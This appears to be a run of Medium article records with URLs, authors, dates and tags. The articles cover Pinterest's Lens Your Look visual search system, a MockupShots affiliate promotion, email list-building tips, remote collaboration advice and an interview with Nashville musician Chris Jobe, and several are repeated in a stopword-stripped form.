leader Charlotte across industry I’ve learned leader starved talent adoption new technology practice evolution Many company getting underway cloud technology attractive many grabbing onto AI ML use case catalyst adoption result super interesting initial work complex enterprise work set foundational cloud architecture service data scientist designer engineer would strongly consider curve alluded earlier numerous company announcing technology hub new presence relocation Charlotte last 6–12 month It’s encouraging also sign soon challenging talent war dissimilar many large city face today perhaps pointed given nature industry frantic pace new build out nature industry mean many financial manufacturing firm tremendous opportunity modernize — service attaining new customer delighting customer creating compelling product continue train uber talented folk coming firm grow world class technologist leader example tremendous growth Charlotte Slalom office relocated mid March roughly 20 employee — today sit north 110 employees… Call Technologists asked number time local leader perception market highlighted always return question — look technology space technology leader leader getting lot blank stare Let’s change together Let’s attract develop technology leader tomorrow Charlotte aren’t Charlotte yet time You’re going diversity industry diversity project diversity thought part rocket ship Similar getting asked technology scene Charlotte get asked quite bit “Why Slalom” frankly spend lot timing talking client recruit “Why Slalom” rationale fairly simple different consulting firm many — advise build design innovate ground floor transform client It’s rare part firm size beholden powerpoint deck much like good set slide second third reason folk join Slalom variety don’t get pigeonholed learn new technology pattern work profound passionate expert ability desire blend management consulting technology local market model global service simply different Charlotte great place live continue grow powerhouse peak interest would love chat Originally posted LinkedIn hereTags Charlotte Analytics Software Development Startup Cloud Computing
3,819
Building Lens your Look: Unifying text and camera search
Eric Kim | Pinterest engineer, Visual Search In February we launched Lens to help Pinners find recipes, style inspiration and products using the camera in our app to search. Since then, our team has been working on new ways of integrating Lens into Pinterest to improve discovery in areas Pinners love most–particularly fashion–with visual search. What we’ve learned is some searches are better served with text, and others with images. But for certain types of searches, it’s best to have both. That’s why we built Lens your Look, as an outfit discovery system that seamlessly combines text and camera search to make Pinterest your personal stylist. Launching today, Lens your Look enables you to snap a photo of an item in your wardrobe and add it to your text search to see outfit ideas inspired by that item. It’s an application of multi-modal search, where we integrate both text search and camera search to give Pinners a more personalized search experience. We use large-scale, object-centered visual search to provide us with a finer-grained understanding of the visual contents of each Pin. Read on to learn how we built the systems powering Lens your Look! Architecture: Multi-modal search Lens Your Look is built using two of Pinterest’s core systems: text search and visual search. By combining text search and visual search into a unified architecture, we can power unique search experiences like Lens your Look. The unified search architecture consists of two stages: candidate generation and visual reranking. Candidate generation In the Lens your Look experience, when we detect the user has done a text search in the fashion category, we give them the option to also take a photo of an article of clothing using Lens. Armed with both a text query and an image query, we leverage Pinterest Search to generate a high-quality set of candidate Pins. On the text side, we harness the latest and greatest of our Search infrastructure to generate a set of Pins matching the user’s original text search query. For instance, if the user searched for “fall outfits,” Lens your Look finds candidate results from our corpus of outfit Pins for the fall season. We also use visual cues from the Lens photo to assist with candidate generation. Our visual query understanding layer outputs useful information about the photo, such as visual objects, salient colors, semantic category, stylistic attributes and other metadata. By combining these visual signals with Pinterest’s text search infrastructure, we’re able to generate a diverse set of candidate Pins for the visual reranker. Visual reranking Next, we visually rerank the candidate Pins with respect to the query image, such as the Pinner’s article of clothing. The goal is to ensure the top returned result Pins include clothing that closely match the query image. Lens Your Look makes use of our visual object detection system, which allows us to visually rerank based on objects in the image, such as specific articles of clothing, rather than across the entire image. Reranking by visual objects gives us a more nuanced view into the visual contents of each Pin, and is a major component that allows Lens your Look to succeed. For more details on the visual reranking system see our paper recently published at the WWW 2017 conference. Multi-task training: Teaching fashion to our visual models Now that we have object-based candidates, we assign a visual similarity score to each candidate. Although we’ve written about transfer learning methods in the past, we needed a more fine-grained representation for Lens your Look. Specifically, our visual embeddings have to model certain stylistic attributes, such as color, pattern, texture and material. This allows our visual reranking system to return results on a more fine-grained level. For instance, red-striped shirts will only be matched with other red-striped shirts, not with blue-striped shirts or red plaid shirts. To accomplish this, we augmented our deep convolutional classification networks to simultaneously train on multiple tasks while maintaining a shared embedding layer. In addition to the typical classification or metric learning loss, we also incorporate task-specific losses, such as predicting fashion attributes and color. This teaches the network to recognize that a striped red shirt shouldn’t be treated the same as a solid navy shirt. Our preliminary results show that incorporating multiple training losses leads to an overall improvement in visual retrieval performance, and we’re excited to continue pushing this frontier. Conclusion Since launching our first visual search product in 2015, the visual search team has developed our infrastructure to support a variety of new features, from powering image search in the Samsung Galaxy S8 to today’s launch of Lens your Look. With one of the largest and richly annotated image datasets around, we have an unending list of exciting ideas to expand and improve Pinterest visual search. If you’d like to help us build innovative visual search features, such as Lens Your Look, join us! Acknowledgements: Lens Your Look is a collaborative effort at Pinterest. We’d like to thank Yiming Jen, Kelei Xu, Cindy Zhang, Josh Beal, Andrew Zhai, Dmitry Kislyuk, Jeffrey Harris, Steven Ramkumar and Laksh Bhasin for the collaboration on this product, Trevor Darrell for his advisement and the rest of the visual search team.
https://medium.com/pinterest-engineering/building-lens-your-look-unifying-text-and-camera-search-1b2f3ef4e393
['Pinterest Engineering']
2017-11-15 17:12:49.549000+00:00
['Visual Search', 'AI', 'Computer Vision', 'Neural Networks', 'Deep Learning']
Title Building Lens Look Unifying text camera searchContent Eric Kim Pinterest engineer Visual Search February launched Lens help Pinners find recipe style inspiration product using camera app search Since team working new way integrating Lens Pinterest improve discovery area Pinners love most–particularly fashion–with visual search we’ve learned search better served text others image certain type search it’s best That’s built Lens Look outfit discovery system seamlessly combine text camera search make Pinterest personal stylist Launching today Lens Look enables snap photo item wardrobe add text search see outfit idea inspired item It’s application multimodal search integrate text search camera search give Pinners personalized search experience use largescale objectcentered visual search provide u finergrained understanding visual content Pin Read learn built system powering Lens Look Architecture Multimodal search Lens Look built using two Pinterest’s core system text search visual search combining text search visual search unified architecture power unique search experience like Lens Look unified search architecture consists two stage candidate generation visual reranking Candidate generation Lens Look experience detect user done text search fashion category give option also take photo article clothing using Lens Armed text query image query leverage Pinterest Search generate highquality set candidate Pins text side harness latest greatest Search infrastructure generate set Pins matching user’s original text search query instance user searched “fall outfits” Lens Look find candidate result corpus outfit Pins fall season also use visual cue Lens photo assist candidate generation visual query understanding layer output useful information photo visual object salient color semantic category stylistic attribute metadata combining visual signal Pinterest’s text search infrastructure we’re able generate diverse set candidate Pins visual reranker Visual reranking Next visually rerank candidate Pins respect query image Pinner’s article clothing goal ensure top returned result Pins include clothing closely match query image Lens Look make use visual object detection system allows u visually rerank based object image specific article clothing rather across entire image Reranking visual object give u nuanced view visual content Pin major component allows Lens Look succeed detail visual reranking system see paper recently published WWW 2017 conference Multitask training Teaching fashion visual model objectbased candidate assign visual similarity score candidate Although we’ve written transfer learning method past needed finegrained representation Lens Look Specifically visual embeddings model certain stylistic attribute color pattern texture material allows visual reranking system return result finegrained level instance redstriped shirt matched redstriped shirt bluestriped shirt red plaid shirt accomplish augmented deep convolutional classification network simultaneously train multiple task maintaining shared embedding layer addition typical classification metric learning loss also incorporate taskspecific loss predicting fashion attribute color teach network recognize striped red shirt shouldn’t treated solid navy shirt preliminary result show incorporating multiple training loss lead overall improvement visual retrieval performance we’re excited continue pushing frontier Conclusion Since launching first visual search product 2015 visual search team developed infrastructure support variety new feature powering image search Samsung Galaxy S8 today’s launch Lens Look one largest richly annotated image datasets around unending list exciting idea expand improve Pinterest visual search you’d like help u build innovative visual search feature Lens Look join u Acknowledgements Lens Look collaborative effort Pinterest We’d like thank Yiming Jen Kelei Xu Cindy Zhang Josh Beal Andrew Zhai Dmitry Kislyuk Jeffrey Harris Steven Ramkumar Laksh Bhasin collaboration product Trevor Darrell advisement rest visual search teamTags Visual Search AI Computer Vision Neural Networks Deep Learning
3,820
MockupShots: Create Your Own Professional Product Shots in Seconds
Writing and Publishing Tools I Use and Recommend MockupShots: Create Your Own Professional Product Shots in Seconds Launch your 2021 marketing efforts with brand new images of your book covers and other products Image created by Jacquelyn Lynn using MockupShots Creating attractive promotional images of your books and information products takes time, expertise, and money. Even though we have the talent and expertise in-house (thanks to the outstanding photography and design skills of Jerry D. Clement), we use MockUpShots to create shareable images of our books in a variety of settings. MockupShots provides more than 600 relevant images (seasonal, holiday, business, casual, with and without people, and more) that you can drop your book cover (or other packaging) into. In seconds, you can download the image to your computer to use any way you want. Image created by Jacquelyn Lynn using MockupShots It’s super easy to use: Just upload your book cover, browse through the mockups, and download the ones you want. Choose from stills, videos, and gifs. MockupShots includes tutorials that show you exactly what to do. Regular lifetime access to MockupShots is $198, but for a limited time, use the special link at the end of this article to get an awesome 60% discount. Pay just $80 for lifetime access to MockupShots for as many books as you want. Image created by Jacquelyn Lynn using MockupShots Use these images on your website, in your marketing materials, on social media — wherever you need professional images of your books in a variety of settings. New images are added regularly. Use MockupShots just once and you’ve more than recovered your investment by eliminating professional photography fees. Get lifetime access for just $80 — a 60% discount off the regular price of $198. Just use my special affiliate link. Go here for a complete list of the resources we use and recommend. This article was originally published on my site at CreateTeachInspire.com. You can reach me there or email me at [email protected]. You might also enjoy: Here’s a little more about me: Finally, here’s how to get a beautiful inspirational quote delivered to your inbox every Saturday:
https://medium.com/publishing-well/mockupshots-create-your-own-professional-product-shots-in-seconds-6ca003ecfb17
['Jacquelyn Lynn']
2020-12-24 01:35:24.742000+00:00
['Self Publishing', 'Business', 'Writing', 'Creativity', 'Photography']
Title MockupShots Create Professional Product Shots SecondsContent Writing Publishing Tools Use Recommend MockupShots Create Professional Product Shots Seconds Launch 2021 marketing effort brand new image book cover product Image created Jacquelyn Lynn using MockupShots Creating attractive promotional image book information product take time expertise money Even though talent expertise inhouse thanks outstanding photography design skill Jerry Clement use MockUpShots create shareable image book variety setting MockupShots provides 600 relevant image seasonal holiday business casual without people drop book cover packaging second download image computer use way want Image created Jacquelyn Lynn using MockupShots It’s super easy use upload book cover browse mockups download one want Choose still video gifs MockupShots includes tutorial show exactly Regular lifetime access MockupShots 198 limited time use special link end article get awesome 60 discount Pay 80 lifetime access MockupShots many book want Image created Jacquelyn Lynn using MockupShots Use image website marketing material social medium — wherever need professional image book variety setting New image added regularly Use MockupShots you’ve recovered investment eliminating professional photography fee Get lifetime access 80 — 60 discount regular price 198 use special affiliate link Go complete list resource use recommend article originally published site CreateTeachInspirecom reach email jacquelyncontacttcscom might also enjoy Here’s little Finally here’s get beautiful inspirational quote delivered inbox every SaturdayTags Self Publishing Business Writing Creativity Photography
3,821
5 Practical Ways to Build Your Email List Like a Smart Marketer
What’s the secret to a successful email campaign? Great design? Engaging subject lines and email copy? Your offer? It’s actually none of these things — while each, in itself, is important, the most crucial aspect of a successful email campaign is a quality email list. A quality email list is one you’ve built through connection with your audience, based on their registered interest, and ideally, segmented by each person’s preferences. So how can you build a great, effective e-mail list? How can you get more warm leads onto your database in order to target them with your future offers? Here are some tips. 1. Website/blog is the best place to take the first step Your website or blog is generally the first thing people visit — so leverage the power of your website and place an email sign-up form on it. When a visitor lands on your blog or site, give him/her a reason to subscribe — offer something valuable in exchange for their information. This could be an educational resource, eBook, white paper, special discount, free demo, or some other incentives. See how Blurb does this: 2. Use the power of content upgrade Brian Dean says that content upgrade increased his conversion rate from 0.54% to 4.82%. That’s 785%. Nathan Ellering, Content Marketing Lead at CoSchedule, shared his take here: “Content upgrade is an absolute best way to build an email list of active subscribers, just like how we’ve built a list of more than 100,000 subscribers at CoSchedule.” If you’re not using the power of content upgrade, you’re missing a great opportunity to build your email list. Create an informational and interesting article, and offer an actionable cheatsheet or quick guide as an upgrade. Add a line at the beginning, middle or end of the post which encourages visitors to download your cheat sheet or guide. Here’s a content upgrade example from Brian Dean: 3. Put a signup button on your Facebook Page Social media is a great medium through which to build an audience, and you can also use it to grow your email list. Add a ‘Sign up’ call to action button to your Facebook Page to collect email addresses — it’s a great way to convert your fans/followers into your subscribers. See how Birchbox does a great job by placing sign up button their Facebook page: 4. Hosting a Webinar Hosting a webinar can be a great way to communicate with your targeted audience — and collect email addresses. The best way to do this is to find trending topic relevant to your service, then conduct a webinar based on that subject. You can then ask potential attendees to provide their contact information in order to join the webinar — and don’t forget to promote it across the social media platforms. See how SEMrush adds a registration form to their Webinar page: 5. Run a Facebook Contest Facebook is also a great channel to run a contest or special offer (Instagram, too, can be beneficial on this front) Create a compelling graphic, engaging title and an irresistible giveaway, then ask your audience for their email address in order to join the contest. Take a look at London Drugs’ Facebook contest: Now that you have five simple, and proven, ways to build a quality email list, it’s time to implement them. Hopefully these tactics will help you to get a good amount of subscribers — start building your list today. Call To Action I’m creating an eBook: “Email Now: A Human Guide to Learn the Art of Email Marketing.” Do you want early access of it? Get on VIP List Here.
https://medium.com/the-mission/5-practical-ways-to-build-your-email-list-like-a-smart-marketer-2b6854ff09a7
['Pawan Kumar']
2018-07-05 15:47:57.973000+00:00
['Email Marketing', 'Marketing', 'Business', 'Digital Marketing', 'Startup']
Title 5 Practical Ways Build Email List Like Smart MarketerContent What’s secret successful email campaign Great design Engaging subject line email copy offer It’s actually none thing — important crucial aspect successful email campaign quality email list quality email list one you’ve built connection audience based registered interest ideally segmented person’s preference build great effective email list get warm lead onto database order target future offer tip 1 Websiteblog best place take first step website blog generally first thing people visit — leverage power website place email signup form visitor land blog site give himher reason subscribe — offer something valuable exchange information could educational resource eBook white paper special discount free demo incentive See Blurb 2 Use power content upgrade Brian Dean say content upgrade increased conversion rate 054 482 That’s 785 Nathan Ellering Content Marketing Lead CoSchedule shared take “Content upgrade absolute best way build email list active subscriber like we’ve built list 100000 subscriber CoSchedule” you’re using power content upgrade you’re missing great opportunity build email list Create informational interesting article offer actionable cheatsheet quick guide upgrade Add line beginning middle end post encourages visitor download cheat sheet guide Here’s content upgrade example Brian Dean 3 Put signup button Facebook Page Social medium great medium build audience also use grow email list Add ‘Sign up’ call action button Facebook Page collect email address — it’s great way convert fansfollowers subscriber See Birchbox great job placing sign button Facebook page 4 Hosting Webinar Hosting webinar great way communicate targeted audience — collect email address best way find trending topic relevant service conduct webinar based subject ask potential attendee provide contact information order join webinar — don’t forget promote across social medium platform See SEMrush add registration form Webinar page 5 Run Facebook Contest Facebook also great channel run contest special offer Instagram beneficial front Create compelling graphic engaging title irresistible giveaway ask audience email address order join contest Take look London Drugs’ Facebook contest five simple proven way build quality email list it’s time implement Hopefully tactic help get good amount subscriber — start building list today Call Action I’m creating eBook “Email Human Guide Learn Art Email Marketing” want early access Get VIP List HereTags Email Marketing Marketing Business Digital Marketing Startup
3,822
Remote Collaboration for World Domination
Make great work with your team no matter where you are in the world. If you’re part of a large te­am or global company then you’re likely collaborating across time and geography every day. Maybe the developers­ on your team are in a different country, your design lead travels frequently or your client is in another city. Regardless of your role or locatio­n you could be reviewing specs, testing prototypes, pitching ideas, coordinating meetings, or delivering a workshop at any point in your day. These collaborative efforts between colleagues, stakeholders, and customers are key to the success of any project. When it comes to delivering these tasks remotely, however, individuals can become separated or ‘siloed’ because of poor communication, cultural differences, and time constraints. I’ve been working with internationally dispersed teams for some years now and I wanted to reassure you that working remotely shouldn’t be a barrier for you and your team to co-create successfully. In fact, remote work offers up lots of unique opportunities for both the individuals and the organizations that embrace it! Lots of companies advocate strongly for remote work. InVision and Automattic being two particularly good examples of this. And it makes perfect sense: allowing employees to work from anywhere in the world is not just good for recruitment but it’s a sure way to increase diversity in your organization. For startups or businesses that want to break into new markets, having a globally dispersed workforce is also a smart way to understand local trends and culture. There are many benefits to remote collaboration but there are also challenges and considerations. If you’re new to this way of working, managing a global team, or if you’re considering a transition abroad and hoping to hold your current role, these tips (tried and tested) may prove useful to you and your team along the way. 1. Start by building relationships. Good collaboration begins with trust. If you’re working alongside someone (even virtually) it’s important you get to know them. Make an effort to understand their strengths, weaknesses, personality, behaviours, and goals. Chatting about hobbies might sound unimportant in the context of business but when you’re not interacting with your teammates every other day over coffee or lunch, allowing time for this may be more beneficial than you think. People do their best work when they’re comfortable in their environment and trust their co-workers. So, get to know each other! Pro-tip: Carve out an afternoon for your team to share something that is interesting or personal to them. Maybe it’s a hobby or side hustle that reflects what they like to do outside of work. This will help you gain a deeper level of empathy and understanding for your team. Lightning talks or lunch n’ learns are fun platforms for these types of activities. (Although traditionally held in-person, you can simply use video conferencing software if your team is remote). 2. Have an agenda and set some goals. Time is precious. To get the best out of your remote session — whether it’s a call, a workshop, a review etc. — always have an agenda set in advance. Even a loose list of objectives will keep you on track and focused on what needs to get done. Above all, end your session with next steps or a to-do list to help clarify everyone’s responsibilities moving forward. I can’t stress how important this is when it comes to remote working. If you’re in a different time zone you may not have the opportunity to check in for another day or two (maybe longer), depending on schedules. Be sure that everyone is aligned and clear on their tasks and goals before the working day ends. 3. Tool up. There are so many great digital tools available — lots for free — that enable teams to brainstorm, plan, or workshop in real-time. It might take a little extra time to learn these tools but that investment up front will increase productivity, communication, and transparency in the long run. Some of my favourites: Slack Messaging platform for the workplace. Mural Virtual whiteboard. Perfect for design thinking activities and research synthesis. Trello Easy to use project management tool. Google Docs and Box File sharing in the cloud. InVision Digital product design platform with prototyping tools and helpful resources. Flow For tracking your tasks and projects. GitHub A dev platform that works for anyone. Track tasks, review code or manage projects. Prototypr A one-stop shop for discovering thousands of design resources and tools. 4. Put the phone down. Too often remote collaboration takes the form of a conference call. Unless the situation warrants an over-the-phone conversation then you should avoid dialling in blindly. Body language is a huge part of how we communicate and is far more effective and meaningful than the words we use alone. Using real-time video services like Zoom, WebEx or Skype will help break down some of the linguistic or cultural barriers that might exist across your team. Anyway, conference calls are notoriously unproductive… 5. Get off email. I recently read that email occupies approx. 23% of the average employee’s workday, and that average employee checks his or her email 36 times an hour. Ugh! So while email may have been radically disruptive some decades ago, it can be more troublesome than useful today. Initially intended for long form written exchanges, we often choose (or misuse) email for instant messaging and collaboration. My advice when it comes to email is, when possible, reduce your inbox by using it to share sensitive or important information only. Instead, choose tools like Slack to stay connected with your colleagues. Messaging platforms like this allow you to have ongoing, short and informal conversations in real-time and on the go.
https://medium.com/design-ibm/remote-collaboration-for-world-domination-e94b2ca724ef
['Lara Hanlon']
2018-07-11 14:38:50.523000+00:00
['Business', 'Collaboration', 'Remote Working', 'Productivity', 'Design']
Title Remote Collaboration World DominationContent Make great work team matter world you’re part large te­am global company you’re likely collaborating across time geography every day Maybe developers­ team different country design lead travel frequently client another city Regardless role locatio­n could reviewing spec testing prototype pitching idea coordinating meeting delivering workshop point day collaborative effort colleague stakeholder customer key success project come delivering task remotely however individual become separated ‘siloed’ poor communication cultural difference time constraint I’ve working internationally dispersed team year wanted reassure working remotely shouldn’t barrier team cocreate successfully fact remote work offer lot unique opportunity individual organization embrace Lots company advocate strongly remote work InVision Automattic two particularly good example make perfect sense allowing employee work anywhere world good recruitment it’s sure way increase diversity organization startup business want break new market globally dispersed workforce also smart way understand local trend culture many benefit remote collaboration also challenge consideration you’re new way working managing global team you’re considering transition abroad hoping hold current role tip tried tested may prove useful team along way 1 Start building relationship Good collaboration begin trust you’re working alongside someone even virtually it’s important get know Make effort understand strength weakness personality behaviour goal Chatting hobby might sound unimportant context business you’re interacting teammate every day coffee lunch allowing time may beneficial think People best work they’re comfortable environment trust coworkers get know Protip Carve afternoon team share something interesting personal Maybe it’s hobby side hustle reflects like outside work help gain deeper level empathy understanding team Lightning talk lunch n’ learns fun platform type activity Although traditionally held inperson simply use video conferencing software team remote 2 agenda set goal Time precious get best remote session — whether it’s call workshop review etc — always agenda set advance Even loose list objective keep track focused need get done end session next step todo list help clarify everyone’s responsibility moving forward can’t stress important come remote working you’re different time zone may opportunity check another day two maybe longer depending schedule sure everyone aligned clear task goal working day end 3 Tool many great digital tool available — lot free — enable team brainstorm plan workshop realtime might take little extra time learn tool investment front increase productivity communication transparency long run favourite Slack Messaging platform workplace Mural Virtual whiteboard Perfect design thinking activity research synthesis Trello Easy use project management tool Google Docs Box File sharing cloud InVision Digital product design platform prototyping tool helpful resource Flow tracking task project GitHub dev platform work anyone Track task review code manage project Prototypr onestop shop discovering thousand design resource tool 4 Put phone often remote collaboration take form conference call Unless situation warrant overthephone conversation avoid dialling blindly Body language huge part communicate far effective meaningful word use alone Using realtime video service like Zoom WebEx Skype help break linguistic cultural barrier might exist across team Anyway conference call notoriously unproductive… 5 Get email recently read email occupies approx 23 average employee’s workday average employee check email 36 time hour Ugh email may radically disruptive decade ago troublesome useful today Initially intended long form written exchange often choose misuse email instant messaging collaboration advice come email possible reduce inbox using share sensitive important information Instead choose tool like Slack stay connected colleague Messaging platform like allow ongoing short informal conversation realtime goTags Business Collaboration Remote Working Productivity Design
3,823
Never Done Changing
Never Done Changing Amidst Nashville’s ever-growing community, pop singer/producer Chris Jobe is consistently moving forward. Chris Jobe, 3/30/18 @ The High Watt While leaning against a wall to keep myself from giving into the urge to nap, I find myself in awe of Chris Jobe’s never ending energy. About an hour after his performance on March 30th, he continues to make the rounds, enthusiastically greeting and thanking everyone still in the venue. Even as we sit down in the stairwell of the High Watt to begin our interview, he never stops moving. It seems natural for him to constantly be in motion — so natural that when I ask Chris to pose for a photo afterwards and he sits completely still, it’s jarring. While some people would see this constant energy as someone easily distracted, it becomes clear that he is a talented multi-tasker. We are interrupted several times by passing friends and fans, and when they’ve moved on, he goes right back to speaking where he left off, even when I’ve already forgotten the question. Chris Jobe, 3/30/18 @ The High Watt The 24 year old singer/songwriter/producer never thought he’d end up in Nashville. After applying to multiple schools in New York and Los Angeles and being daunted by the cost, he received a scholarship from Belmont University and, after learning about their music program, decided to give it a shot. He’s now been in Nashville for six years, happy with the community and the way he’s been able to grow as an artist. It’s clear that change and growth have been a constant for him over the years — and he doesn’t expect that to end anytime soon. “What sort of music do you create?” “Originally, it was going to be sarcastically happy pop stuff, and then it ended up being like more indie pop-type R&B.” “How long have you been writing and performing?” “I was 12 years old when I wrote my first song. My parents had just gotten a divorce and I was taking a poetry class…” he pauses, laughing. “I was a very deep twelve year old, all I listened to was Yellow by Coldplay, and lots of David Bowie and Jimmy Hendrix. That was my thing.” He then tells me about his first-ever performance as an 18 year old new to Nashville. It was at the Hard Rock Cafe, and was “terrible.” “Everything that could have gone wrong went wrong — and it was an ugly Christmas Sweater party, so I was wearing my ugliest sweater that you can imagine. I still hadn’t grown into my face yet, and I looked like a young, tall baby in a grandma’s Christmas sweater — and not doing well either.” image via Halfthestory, 10/16/17 @ The High Watt “Stuff like this is never going to be perfect, so performing is really just a matter of being there for people, being a conduit.” If the energy in the crowds that regularly show up at his shows are any indication, Chris Jobe has left that rough start far behind him. It’s taken a lot of work that continues to this day. “Honestly, I’m quite a perfectionist, and performing is not made for perfectionists. Leading up to a show, I always get so anxious. I try to go in there and capture the vibe of every song — but it’s weird to me because I feel like no matter what I do as a performer, it’s always different.” He states that his favorite part of performing is “stage banter” along with witnessing the crowd’s reactions from stage. He wants to be connected with the fans as much as he is with the music — but no matter what other people think, he’s going to follow his own instincts. “Stage,” the song he always opens his live sets with, “is kind of about my parents doubting me growing up. I think it’s an important message for kids — if you really want to do something, don’t whine about it, just do it. Just show your parents, hey, look what I can do.” The fact that now his parents have come around makes it a difficult song for him to continue to connect with, and he’s considering removing it from his set lists, even though it’s a crowd favorite. “Now my parents are very supportive because they’ve seen it all happening. So I’m not pissed at my parents anymore but… I dunno, it’s just this weird thing.” “I’m very competitive, and I know music is not a competition by any means, but I feel inspired and driven by my friends’ success — like this guy is fucking crushing it right now, I hope I can get to that level.” One of the things that is not in question is the viral success of his first single, Thank You Internet. “Thank You Internet is something we rewrote several times because the first time we wrote it, we wrote it as a complete joke, my buddy Kyle and I.” He then sings the original bridge while we sit in the stairwell, sending some passing fans and myself into fits of laughter. “Dog and cat videos, yeah! All that shit can stay. But Kim Kardashian and her fake ass — that shit is lame!” Recovering, I ask him about the production of the video, which seemed extremely large scale for an indie artist. “It took about two or three weeks of planning. I have a bunch of talented friends who came together, and it was one of those things where everything fell into place kind of by luck.” A friend of his who has produced successful music videos in the past helped him with permits for filming locations, and keeping Chris’ “overly ambitious ideas” reined in. One of these ambitious ideas was to reach out to different apps and ask them to help with the animation. “We sent it to Tinder and Bumble and Uber, like hey I want to put you in my video, and the ones who responded listened to the song and were like ‘aren’t you dissing us, why would we pay you or give you a sponsorship?’” He also reached out to an animation company in Indiana that was luckily willing to work with him on a “nearly non-existent budget.” Everything, from the usernames in the video to the locations to the time stamps are extremely intentional. With the combination of catchy, relatable lyrics and excellent animation, once the video was completed, they did get one major social media outlet on board. “Once we had the video all put together, we sent it to Facebook and they were like ‘we love this, we want you to be artist of the day.’ We thought it was crazy, but they released it and we got to watch it grow organically. It’s been amazing.” At the time of this article being published on April 17, 2018, the original post of Thank You Internet on Music on Facebook has had 981,890 views — at the time of the interview on April 1st, it had 846K. “I feel like I have a lot of friends who had a song that’s popped off, and for me to have this video, and having so many people show up on Facebook — which I hadn’t really used because I’m such an Instagram guy — that was a really cool experience.” image via Chris Jobe “I’m not focused on getting a label, I’m just focused on getting to a place where I’m super proud of everything I’m doing, so I can give that over to the fans without anxiety. I feel like I’m on the right track.” Shortly after TYI, he released his second single, Love In The Morning. Both are crowd pleasers at his live shows, but he feels more comfortable with the latter. “It’s fun and I like what TYI is about, but stylistically it’s different compared to the other songs that I sing where I’m like, ‘hey this is a piece of my soul, here you go.’” He currently has the release of two more singles planned, and is excited to see how his fans receive them. While creating music may take up the majority of his time, Chris does attempt to make it to his friends shows, and make time for other interests. One of his favorite books is The War of Art by Steven Pressfield, which he recommends to all creative people. He enjoyed the movie Ladybird, and hopes Timothée Chalamet — “the guy that was in Ladybird with the french name, on the cover of GQ, kind of androgynous, really good looking dude…” — would play him if there is ever a movie made about his life. When I ask my final question — if there is a song that isn’t his own that he felt described him — he chooses Changing by John Mayer. “It seems crazy because I’m not personally into country-style music, but it’s some of the best songwriting. ‘I’m not done changing/I may be old and I may be young/but I am not done changing.’ I feel like that’s always relevant for me.” Any creative folks who are anxious about turning their projects into their careers can certainly look to Chris Jobe as an example: Accept that change is inevitable & allow it to fuel your growth. Get ready & stay tuned for Chris Jobe’s upcoming singles by following him on Instagram, Facebook, and Spotify! If you’re in the Nashville area, his next performance is a free show at Analog on April 26th at 8:30pm. Enjoy what you just read? Learn more about Meridian Creators here, give us a like on Facebook, follow us on Instagram & Twitter, and consider supporting our growth by subscribing monthly through Patreon or giving a one-time donation through PayPal!
https://medium.com/meridian-creators/never-done-changing-d685ab455382
['Taralei Griffin']
2018-04-18 00:51:21.337000+00:00
['Nashville', 'Music', 'Interview', 'Creativity', 'Indie']
Title Never Done ChangingContent Never Done Changing Amidst Nashville’s evergrowing community pop singerproducer Chris Jobe consistently moving forward Chris Jobe 33018 High Watt leaning wall keep giving urge nap find awe Chris Jobe’s never ending energy hour performance March 30th continues make round enthusiastically greeting thanking everyone still venue Even sit stairwell High Watt begin interview never stop moving seems natural constantly motion — natural ask Chris pose photo afterwards sits completely still it’s jarring people would see constant energy someone easily distracted becomes clear talented multitasker interrupted several time passing friend fan they’ve moved go right back speaking left even I’ve already forgotten question Chris Jobe 33018 High Watt 24 year old singersongwriterproducer never thought he’d end Nashville applying multiple school New York Los Angeles daunted cost received scholarship Belmont University learning music program decided give shot He’s Nashville six year happy community way he’s able grow artist It’s clear change growth constant year — doesn’t expect end anytime soon “What sort music create” “Originally going sarcastically happy pop stuff ended like indie poptype RB” “How long writing performing” “I 12 year old wrote first song parent gotten divorce taking poetry class…” pause laughing “I deep twelve year old listened Yellow Coldplay lot David Bowie Jimmy Hendrix thing” tell firstever performance 18 year old new Nashville Hard Rock Cafe “terrible” “Everything could gone wrong went wrong — ugly Christmas Sweater party wearing ugliest sweater imagine still hadn’t grown face yet looked like young tall baby grandma’s Christmas sweater — well either” image via Halfthestory 101617 High Watt “Stuff like never going perfect performing really matter people conduit” energy crowd regularly show show indication Chris Jobe left rough start far behind It’s taken lot work continues day “Honestly I’m quite perfectionist performing made perfectionist Leading show always get anxious try go capture vibe every song — it’s weird feel like matter performer it’s always different” state favorite part performing “stage banter” along witnessing crowd’s reaction stage want connected fan much music — matter people think he’s going follow instinct “Stage” song always open live set “is kind parent doubting growing think it’s important message kid — really want something don’t whine show parent hey look do” fact parent come around make difficult song continue connect he’s considering removing set list even though it’s crowd favorite “Now parent supportive they’ve seen happening I’m pissed parent anymore but… dunno it’s weird thing” “I’m competitive know music competition mean feel inspired driven friends’ success — like guy fucking crushing right hope get level” One thing question viral success first single Thank Internet “Thank Internet something rewrote several time first time wrote wrote complete joke buddy Kyle I” sings original bridge sit stairwell sending passing fan fit laughter “Dog cat video yeah shit stay Kim Kardashian fake as — shit lame” Recovering ask production video seemed extremely large scale indie artist “It took two three week planning bunch talented friend came together one thing everything fell place kind luck” friend produced successful music video past helped permit filming location keeping Chris’ “overly ambitious ideas” reined One ambitious idea reach different apps ask help animation “We sent Tinder Bumble Uber like hey want put video one responded listened song like ‘aren’t dissing u would pay give sponsorship’” also reached animation company Indiana luckily willing work “nearly nonexistent budget” Everything usernames video location time stamp extremely intentional combination catchy relatable lyric excellent animation video completed get one major social medium outlet board “Once video put together sent Facebook like ‘we love want artist day’ thought crazy released got watch grow organically It’s amazing” time article published April 17 2018 original post Thank Internet Music Facebook 981890 view — time interview April 1st 846K “I feel like lot friend song that’s popped video many people show Facebook — hadn’t really used I’m Instagram guy — really cool experience” image via Chris Jobe “I’m focused getting label I’m focused getting place I’m super proud everything I’m give fan without anxiety feel like I’m right track” Shortly TYI released second single Love Morning crowd pleaser live show feel comfortable latter “It’s fun like TYI stylistically it’s different compared song sing I’m like ‘hey piece soul go’” currently release two single planned excited see fan receive creating music may take majority time Chris attempt make friend show make time interest One favorite book War Art Steven Pressfield recommends creative people enjoyed movie Ladybird hope Timothée Chalamet — “the guy Ladybird french name cover GQ kind androgynous really good looking dude…” — would play ever movie made life ask final question — song isn’t felt described — chooses Changing John Mayer “It seems crazy I’m personally countrystyle music it’s best songwriting ‘I’m done changingI may old may youngbut done changing’ feel like that’s always relevant me” creative folk anxious turning project career certainly look Chris Jobe example Accept change inevitable allow fuel growth Get ready stay tuned Chris Jobe’s upcoming single following Instagram Facebook Spotify you’re Nashville area next performance free show Analog April 26th 830pm Enjoy read Learn Meridian Creators give u like Facebook 